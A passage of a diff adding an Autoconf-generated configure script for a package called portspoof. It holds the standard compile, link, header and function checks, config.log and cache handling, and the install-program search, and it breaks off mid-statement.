mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } >/dev/null && { + test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || + test ! -s conftest.err + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_cpp + +@%:@ ac_fn_c_try_run LINENO +@%:@ ---------------------- +@%:@ Try to link conftest.@S|@ac_ext, and return whether this succeeded. Assumes +@%:@ that executables *can* be run. +ac_fn_c_try_run () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { ac_try='./conftest$ac_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then : + ac_retval=0 +else + $as_echo "$as_me: program exited with status $ac_status" >&5 + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=$ac_status +fi + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_run + +@%:@ ac_fn_c_check_header_mongrel LINENO HEADER VAR INCLUDES +@%:@ ------------------------------------------------------- +@%:@ Tests whether HEADER exists, giving a warning if it cannot be compiled using +@%:@ the include files in INCLUDES and setting the cache variable VAR +@%:@ accordingly. +ac_fn_c_check_header_mongrel () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +else + # Is the header compilable? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 usability" >&5 +$as_echo_n "checking $2 usability... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +@%:@include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_header_compiler=yes +else + ac_header_compiler=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_compiler" >&5 +$as_echo "$ac_header_compiler" >&6; } + +# Is the header present? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 presence" >&5 +$as_echo_n "checking $2 presence... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include <$2> +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + ac_header_preproc=yes +else + ac_header_preproc=no +fi +rm -f conftest.err conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_preproc" >&5 +$as_echo "$ac_header_preproc" >&6; } + +# So? What about this header? +case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in #(( + yes:no: ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&5 +$as_echo "$as_me: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} + ;; + no:yes:* ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: present but cannot be compiled" >&5 +$as_echo "$as_me: WARNING: $2: present but cannot be compiled" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: check for missing prerequisite headers?" >&5 +$as_echo "$as_me: WARNING: $2: check for missing prerequisite headers?" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: see the Autoconf documentation" >&5 +$as_echo "$as_me: WARNING: $2: see the Autoconf documentation" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&5 +$as_echo "$as_me: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} +( cat <<\_ASBOX +## ---------------------------------- ## +## Report this to piotratduszynski.eu ## +## ---------------------------------- ## +_ASBOX + ) | sed "s/^/$as_me: WARNING: /" >&2 + ;; +esac + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=\$ac_header_compiler" +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_header_mongrel + +@%:@ ac_fn_c_check_header_compile LINENO HEADER VAR INCLUDES +@%:@ ------------------------------------------------------- +@%:@ Tests whether HEADER exists and can be compiled using the include files in +@%:@ INCLUDES, setting the cache variable VAR accordingly. +ac_fn_c_check_header_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +@%:@include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_header_compile + +@%:@ ac_fn_c_check_type LINENO TYPE VAR INCLUDES +@%:@ ------------------------------------------- +@%:@ Tests whether TYPE exists after having included INCLUDES, setting cache +@%:@ variable VAR accordingly. +ac_fn_c_check_type () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=no" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof ($2)) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof (($2))) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + +else + eval "$3=yes" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_type + +@%:@ ac_fn_c_try_link LINENO +@%:@ ----------------------- +@%:@ Try to link conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_link () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext conftest$ac_exeext + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest$ac_exeext && { + test "$cross_compiling" = yes || + $as_test_x conftest$ac_exeext + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information + # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would + # interfere with the next link command; also delete a directory that is + # left behind by Apple's compiler. We do this before executing the actions. + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_link + +@%:@ ac_fn_c_check_func LINENO FUNC VAR +@%:@ ---------------------------------- +@%:@ Tests whether FUNC exists, setting the cache variable VAR accordingly +ac_fn_c_check_func () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +/* Define $2 to an innocuous variant, in case declares $2. + For example, HP-UX 11i declares gettimeofday. */ +#define $2 innocuous_$2 + +/* System header to define __stub macros and hopefully few prototypes, + which can conflict with char $2 (); below. + Prefer to if __STDC__ is defined, since + exists even on freestanding compilers. */ + +#ifdef __STDC__ +# include +#else +# include +#endif + +#undef $2 + +/* Override any GCC internal prototype to avoid an error. + Use char because int might match the return type of a GCC + builtin and then its argument prototype would still apply. */ +#ifdef __cplusplus +extern "C" +#endif +char $2 (); +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ +#if defined __stub_$2 || defined __stub___$2 +choke me +#endif + +int +main () +{ +return $2 (); + ; + return 0; +} +_ACEOF +if ac_fn_c_try_link "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext \ + conftest$ac_exeext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_func +cat >config.log <<_ACEOF +This file contains any messages produced by compilers while +running configure, to aid debugging if configure makes a mistake. + +It was created by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was + + $ $0 $@ + +_ACEOF +exec 5>>config.log +{ +cat <<_ASUNAME +## --------- ## +## Platform. ## +## --------- ## + +hostname = `(hostname || uname -n) 2>/dev/null | sed 1q` +uname -m = `(uname -m) 2>/dev/null || echo unknown` +uname -r = `(uname -r) 2>/dev/null || echo unknown` +uname -s = `(uname -s) 2>/dev/null || echo unknown` +uname -v = `(uname -v) 2>/dev/null || echo unknown` + +/usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null || echo unknown` +/bin/uname -X = `(/bin/uname -X) 2>/dev/null || echo unknown` + +/bin/arch = `(/bin/arch) 2>/dev/null || echo unknown` +/usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null || echo unknown` +/usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null || echo unknown` +/usr/bin/hostinfo = `(/usr/bin/hostinfo) 2>/dev/null || echo unknown` +/bin/machine = `(/bin/machine) 2>/dev/null || echo unknown` +/usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null || echo unknown` +/bin/universe = `(/bin/universe) 2>/dev/null || echo unknown` + +_ASUNAME + +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + $as_echo "PATH: $as_dir" + done +IFS=$as_save_IFS + +} >&5 + +cat >&5 <<_ACEOF + + +## ----------- ## +## Core tests. ## +## ----------- ## + +_ACEOF + + +# Keep a trace of the command line. +# Strip out --no-create and --no-recursion so they do not pile up. +# Strip out --silent because we don't want to record it for future runs. +# Also quote any args containing shell meta-characters. +# Make two passes to allow for proper duplicate-argument suppression. +ac_configure_args= +ac_configure_args0= +ac_configure_args1= +ac_must_keep_next=false +for ac_pass in 1 2 +do + for ac_arg + do + case $ac_arg in + -no-create | --no-c* | -n | -no-recursion | --no-r*) continue ;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil) + continue ;; + *\'*) + ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + case $ac_pass in + 1) as_fn_append ac_configure_args0 " '$ac_arg'" ;; + 2) + as_fn_append ac_configure_args1 " '$ac_arg'" + if test $ac_must_keep_next = true; then + ac_must_keep_next=false # Got value, back to normal. + else + case $ac_arg in + *=* | --config-cache | -C | -disable-* | --disable-* \ + | -enable-* | --enable-* | -gas | --g* | -nfp | --nf* \ + | -q | -quiet | --q* | -silent | --sil* | -v | -verb* \ + | -with-* | --with-* | -without-* | --without-* | --x) + case "$ac_configure_args0 " in + "$ac_configure_args1"*" '$ac_arg' "* ) continue ;; + esac + ;; + -* ) ac_must_keep_next=true ;; + esac + fi + as_fn_append ac_configure_args " '$ac_arg'" + ;; + esac + done +done +{ ac_configure_args0=; unset ac_configure_args0;} +{ ac_configure_args1=; unset ac_configure_args1;} + +# When interrupted or exit'd, cleanup temporary files, and complete +# config.log. We remove comments because anyway the quotes in there +# would cause problems or look ugly. +# WARNING: Use '\'' to represent an apostrophe within the trap. +# WARNING: Do not start the trap code with a newline, due to a FreeBSD 4.0 bug. +trap 'exit_status=$? + # Save into config.log some information that might help in debugging. + { + echo + + cat <<\_ASBOX +## ---------------- ## +## Cache variables. ## +## ---------------- ## +_ASBOX + echo + # The following way of writing the cache mishandles newlines in values, +( + for ac_var in `(set) 2>&1 | sed -n '\''s/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'\''`; do + eval ac_val=\$$ac_var + case $ac_val in #( + *${as_nl}*) + case $ac_var in #( + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; + esac + case $ac_var in #( + _ | IFS | as_nl) ;; #( + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; + esac ;; + esac + done + (set) 2>&1 | + case $as_nl`(ac_space='\'' '\''; set) 2>&1` in #( + *${as_nl}ac_space=\ *) + sed -n \ + "s/'\''/'\''\\\\'\'''\''/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\''\\2'\''/p" + ;; #( + *) + sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" + ;; + esac | + sort +) + echo + + cat <<\_ASBOX +## ----------------- ## +## Output variables. ## +## ----------------- ## +_ASBOX + echo + for ac_var in $ac_subst_vars + do + eval ac_val=\$$ac_var + case $ac_val in + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + esac + $as_echo "$ac_var='\''$ac_val'\''" + done | sort + echo + + if test -n "$ac_subst_files"; then + cat <<\_ASBOX +## ------------------- ## +## File substitutions. ## +## ------------------- ## +_ASBOX + echo + for ac_var in $ac_subst_files + do + eval ac_val=\$$ac_var + case $ac_val in + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + esac + $as_echo "$ac_var='\''$ac_val'\''" + done | sort + echo + fi + + if test -s confdefs.h; then + cat <<\_ASBOX +## ----------- ## +## confdefs.h. ## +## ----------- ## +_ASBOX + echo + cat confdefs.h + echo + fi + test "$ac_signal" != 0 && + $as_echo "$as_me: caught signal $ac_signal" + $as_echo "$as_me: exit $exit_status" + } >&5 + rm -f core *.core core.conftest.* && + rm -f -r conftest* confdefs* conf$$* $ac_clean_files && + exit $exit_status +' 0 +for ac_signal in 1 2 13 15; do + trap 'ac_signal='$ac_signal'; as_fn_exit 1' $ac_signal +done +ac_signal=0 + +# confdefs.h avoids OS command line length limits that DEFS can exceed. +rm -f -r conftest* confdefs.h + +$as_echo "/* confdefs.h */" > confdefs.h + +# Predefined preprocessor variables. + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_NAME "$PACKAGE_NAME" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_TARNAME "$PACKAGE_TARNAME" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_VERSION "$PACKAGE_VERSION" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_STRING "$PACKAGE_STRING" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_BUGREPORT "$PACKAGE_BUGREPORT" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_URL "$PACKAGE_URL" +_ACEOF + + +# Let the site file select an alternate cache file if it wants to. +# Prefer an explicitly selected file to automatically selected ones. +ac_site_file1=NONE +ac_site_file2=NONE +if test -n "$CONFIG_SITE"; then + ac_site_file1=$CONFIG_SITE +elif test "x$prefix" != xNONE; then + ac_site_file1=$prefix/share/config.site + ac_site_file2=$prefix/etc/config.site +else + ac_site_file1=$ac_default_prefix/share/config.site + ac_site_file2=$ac_default_prefix/etc/config.site +fi +for ac_site_file in "$ac_site_file1" "$ac_site_file2" +do + test "x$ac_site_file" = xNONE && continue + if test /dev/null != "$ac_site_file" && test -r "$ac_site_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading site script $ac_site_file" >&5 +$as_echo "$as_me: loading site script $ac_site_file" >&6;} + sed 's/^/| /' "$ac_site_file" >&5 + . "$ac_site_file" + fi +done + +if test -r "$cache_file"; then + # Some versions of bash will fail to source /dev/null (special files + # actually), so we avoid doing that. DJGPP emulates it as a regular file. + if test /dev/null != "$cache_file" && test -f "$cache_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading cache $cache_file" >&5 +$as_echo "$as_me: loading cache $cache_file" >&6;} + case $cache_file in + [\\/]* | ?:[\\/]* ) . "$cache_file";; + *) . "./$cache_file";; + esac + fi +else + { $as_echo "$as_me:${as_lineno-$LINENO}: creating cache $cache_file" >&5 +$as_echo "$as_me: creating cache $cache_file" >&6;} + >$cache_file +fi + +# Check that the precious variables saved in the cache have kept the same +# value. +ac_cache_corrupted=false +for ac_var in $ac_precious_vars; do + eval ac_old_set=\$ac_cv_env_${ac_var}_set + eval ac_new_set=\$ac_env_${ac_var}_set + eval ac_old_val=\$ac_cv_env_${ac_var}_value + eval ac_new_val=\$ac_env_${ac_var}_value + case $ac_old_set,$ac_new_set in + set,) + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,set) + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was not set in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,);; + *) + if test "x$ac_old_val" != "x$ac_new_val"; then + # differences in whitespace do not lead to failure. + ac_old_val_w=`echo x $ac_old_val` + ac_new_val_w=`echo x $ac_new_val` + if test "$ac_old_val_w" != "$ac_new_val_w"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' has changed since the previous run:" >&5 +$as_echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} + ac_cache_corrupted=: + else + { $as_echo "$as_me:${as_lineno-$LINENO}: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&5 +$as_echo "$as_me: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&2;} + eval $ac_var=\$ac_old_val + fi + { $as_echo "$as_me:${as_lineno-$LINENO}: former value: \`$ac_old_val'" >&5 +$as_echo "$as_me: former value: \`$ac_old_val'" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: current value: \`$ac_new_val'" >&5 +$as_echo "$as_me: current value: \`$ac_new_val'" >&2;} + fi;; + esac + # Pass precious variables to config.status. + if test "$ac_new_set" = set; then + case $ac_new_val in + *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; + *) ac_arg=$ac_var=$ac_new_val ;; + esac + case " $ac_configure_args " in + *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. + *) as_fn_append ac_configure_args " '$ac_arg'" ;; + esac + fi +done +if $ac_cache_corrupted; then + { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: error: changes in the environment can compromise the build" >&5 +$as_echo "$as_me: error: changes in the environment can compromise the build" >&2;} + as_fn_error "run \`make distclean' and/or \`rm $cache_file' and start over" "$LINENO" 5 +fi +## -------------------- ## +## Main body of script. ## +## -------------------- ## + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + +ac_aux_dir= +for ac_dir in auto "$srcdir"/auto; do + for ac_t in install-sh install.sh shtool; do + if test -f "$ac_dir/$ac_t"; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/$ac_t -c" + break 2 + fi + done +done +if test -z "$ac_aux_dir"; then + as_fn_error "cannot find install-sh, install.sh, or shtool in auto \"$srcdir\"/auto" "$LINENO" 5 +fi + +# These three variables are undocumented and unsupported, +# and are intended to be withdrawn in a future Autoconf release. +# They can cause serious problems if a builder's source tree is in a directory +# whose full name contains unusual characters. +ac_config_guess="$SHELL $ac_aux_dir/config.guess" # Please don't use this var. +ac_config_sub="$SHELL $ac_aux_dir/config.sub" # Please don't use this var. +ac_configure="$SHELL $ac_aux_dir/configure" # Please don't use this var. + + + + +am__api_version='1.11' + +# Find a good install program. We prefer a C program (faster), +# so one script is as good as another. But avoid the broken or +# incompatible versions: +# SysV /etc/install, /usr/sbin/install +# SunOS /usr/etc/install +# IRIX /sbin/install +# AIX /bin/install +# AmigaOS /C/install, which installs bootblocks on floppy discs +# AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag +# AFS /usr/afsws/bin/install, which mishandles nonexistent args +# SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" +# OS/2's system install, which has a completely different semantic +# ./install, which can be erroneously created by make from ./install.sh. +# Reject install programs that cannot install multiple files. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a BSD-compatible install" >&5 +$as_echo_n "checking for a BSD-compatible install... " >&6; } +if test -z "$INSTALL"; then +if test "${ac_cv_path_install+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + # Account for people who put trailing slashes in PATH elements. +case $as_dir/ in @%:@(( + ./ | .// | /[cC]/* | \ + /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ + ?:[\\/]os2[\\/]install[\\/]* | ?:[\\/]OS2[\\/]INSTALL[\\/]* | \ + /usr/ucb/* ) ;; + *) + # OSF1 and SCO ODT 3.0 have their own names for install. + # Don't use installbsd from OSF since it installs stuff as root + # by default. + for ac_prog in ginstall scoinst install; do + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; }; then + if test $ac_prog = install && + grep dspmsg "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # AIX install. It has an incompatible calling convention. + : + elif test $ac_prog = install && + grep pwplus "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # program-specific install script used by HP pwplus--don't use. + : + else + rm -rf conftest.one conftest.two conftest.dir + echo one > conftest.one + echo two > conftest.two + mkdir conftest.dir + if "$as_dir/$ac_prog$ac_exec_ext" -c conftest.one conftest.two "`pwd`/conftest.dir" && + test -s conftest.one && test -s conftest.two && + test -s conftest.dir/conftest.one && + test -s conftest.dir/conftest.two + then + ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" + break 3 + fi + fi + fi + done + done + ;; +esac + + done +IFS=$as_save_IFS + +rm -rf conftest.one conftest.two conftest.dir + +fi + if test "${ac_cv_path_install+set}" = set; then + INSTALL=$ac_cv_path_install + else + # As a last resort, use the slow shell script. Don't cache a + # value for INSTALL within a source directory, because that will + # break other packages using the cache if that directory is + # removed, or if the value is a relative name. + INSTALL=$ac_install_sh + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $INSTALL" >&5 +$as_echo "$INSTALL" >&6; } + +# Use test -z because SunOS4 sh mishandles braces in ${var-val}. +# It thinks the first close brace ends the variable substitution. +test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' + +test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' + +test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether build environment is sane" >&5 +$as_echo_n "checking whether build environment is sane... " >&6; } +# Just in case +sleep 1 +echo timestamp > conftest.file +# Reject unsafe characters in $srcdir or the absolute working directory +# name. Accept space and tab only in the latter. +am_lf=' +' +case `pwd` in + *[\\\"\#\$\&\'\`$am_lf]*) + as_fn_error "unsafe absolute working directory name" "$LINENO" 5;; +esac +case $srcdir in + *[\\\"\#\$\&\'\`$am_lf\ \ ]*) + as_fn_error "unsafe srcdir value: \`$srcdir'" "$LINENO" 5;; +esac + +# Do `set' in a subshell so we don't clobber the current shell's +# arguments. Must try -L first in case configure is actually a +# symlink; some systems play weird games with the mod time of symlinks +# (eg FreeBSD returns the mod time of the symlink's containing +# directory). +if ( + set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` + if test "$*" = "X"; then + # -L didn't work. + set X `ls -t "$srcdir/configure" conftest.file` + fi + rm -f conftest.file + if test "$*" != "X $srcdir/configure conftest.file" \ + && test "$*" != "X conftest.file $srcdir/configure"; then + + # If neither matched, then we have a broken ls. This can happen + # if, for instance, CONFIG_SHELL is bash and it inherits a + # broken ls alias from the environment. This has actually + # happened. Such a system could not be considered "sane". + as_fn_error "ls -t appears to fail. Make sure there is not a broken +alias in your environment" "$LINENO" 5 + fi + + test "$2" = conftest.file + ) +then + # Ok. + : +else + as_fn_error "newly created file is older than distributed files! +Check your system clock" "$LINENO" 5 +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +test "$program_prefix" != NONE && + program_transform_name="s&^&$program_prefix&;$program_transform_name" +# Use a double $ so make ignores it. +test "$program_suffix" != NONE && + program_transform_name="s&\$&$program_suffix&;$program_transform_name" +# Double any \ or $. +# By default was `s,x,x', remove it if useless. +ac_script='s/[\\$]/&&/g;s/;s,x,x,$//' +program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"` + +# expand $ac_aux_dir to an absolute path +am_aux_dir=`cd $ac_aux_dir && pwd` + +if test x"${MISSING+set}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; + *) + MISSING="\${SHELL} $am_aux_dir/missing" 